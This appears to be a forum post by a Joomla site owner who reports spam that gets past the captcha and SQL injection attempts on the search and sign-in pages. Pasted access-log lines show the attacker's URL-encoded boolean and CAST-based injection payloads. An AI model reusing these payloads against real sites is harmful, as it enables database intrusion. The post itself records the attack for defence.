Already have huge attacks. I try to ban the bad IPs using firewall, but it seems he has many IPs.
I think the problem is joomla header, which let bad guy know what it is, and find correct attack tools. I edit the code to remove that "generator", but got wiped out on a new update.
<meta name="generator" content="Joomla! - Open Source Content Management" />
(1) Got 2 spam emails, even though I have Captcha on. I had my own simple spam verification on my contact page for years, and never got a single spam email. I simply generate two random numbers, and ask the person to sum them (number is shown inside images), such as 9 + 7 = ?
(2) Someone is attacking with SQL query on search page and sign-in page, such as
Code: Select all
194.61.25.18 - - [25/Sep/2021:01:54:19 -0500] "GET /insider-trading/\"%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4164=6508)%20THEN%20''%20ELSE%200x28%20END))--%20DAyx2016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:20 -0500] "GET /insider-trading/\"%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4220=4220)%20THEN%20''%20ELSE%200x28%20END))--%20phWW2016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:20 -0500] "GET /insider-trading/)%20RLIKE%20(SELECT%20(CASE%20WHEN%20(8656=9419)%20THEN%20''%20ELSE%200x28%20END))%20AND%20(7416=74162016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:21 -0500] "GET /insider-trading/)%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4220=4220)%20THEN%20''%20ELSE%200x28%20END))%20AND%20(1087=10872016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:22 -0500] "GET /insider-trading/))%20RLIKE%20(SELECT%20(CASE%20WHEN%20(1431=1548)%20THEN%20''%20ELSE%200x28%20END))%20AND%20((8396=83962016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:23 -0500] "GET /insider-trading/))%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4220=4220)%20THEN%20''%20ELSE%200x28%20END))%20AND%20((8073=80732016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:23 -0500] "GET /insider-trading/)))%20RLIKE%20(SELECT%20(CASE%20WHEN%20(6195=8060)%20THEN%20''%20ELSE%200x28%20END))%20AND%20(((7613=76132016.htm HTTP/1.1" 500 5774 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:24 -0500] "GET /insider-trading/)))%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4220=4220)%20THEN%20''%20ELSE%200x28%20END))%20AND%20(((5611=56112016.htm HTTP/1.1" 500 5774 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:25 -0500] "GET /insider-trading/%20RLIKE%20(SELECT%20(CASE%20WHEN%20(9782=6062)%20THEN%20''%20ELSE%200x28%20END))2016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:26 -0500] "GET /insider-trading/%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4220=4220)%20THEN%20''%20ELSE%200x28%20END))2016.htm HTTP/1.1" 500 5872 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:01:54:26 -0500] "GET /insider-trading/')%20RLIKE%20(SELECT%20(CASE%20WHEN%20(6565=7780)%20THEN%20''%20ELSE%200x28%20END))%20AND%20('BHoJ'='BHoJ2016.htm HTTP/1.1" 500 6114 "https://www.secform4.com:443/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0"
194.61.25.18 - - [25/Sep/2021:10:51:09 -0500] "POST /account/sign-in?task=user.login%29%20AND%208819%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288819%3D8819%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%287934%3D7934 HTTP/1.1" 200 8632 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:09 -0500] "POST /account/sign-in?task=user.login%20AND%208819%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288819%3D8819%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29 HTTP/1.1" 200 8621 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:10 -0500] "POST /account/sign-in?task=user.login%27%29%20AND%208819%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288819%3D8819%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27DTym%27%3D%27DTym HTTP/1.1" 200 8632 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:11 -0500] "POST /account/sign-in?task=user.login%27%20AND%208819%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288819%3D8819%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27haTS%27%3D%27haTS HTTP/1.1" 200 8632 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:12 -0500] "POST /account/sign-in?task=user.login%20AND%208819%3DCAST%28%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28112%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288819%3D8819%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28122%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20hcJb HTTP/1.1" 200 8627 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:12 -0500] "POST /account/sign-in?task=user.login%29%20AND%207108%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%287108%3D7108%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%285878%3D5878 HTTP/1.1" 200 8643 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:13 -0500] "POST /account/sign-in?task=user.login%20AND%207108%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%287108%3D7108%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29 HTTP/1.1" 200 8632 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"
194.61.25.18 - - [25/Sep/2021:10:51:14 -0500] "POST /account/sign-in?task=user.login%27%29%20AND%207108%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28106%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%287108%3D7108%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28113%29%29%29%20AND%20%28%27kMmu%27%3D%27kMmu HTTP/1.1" 200 8643 "-" "Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3"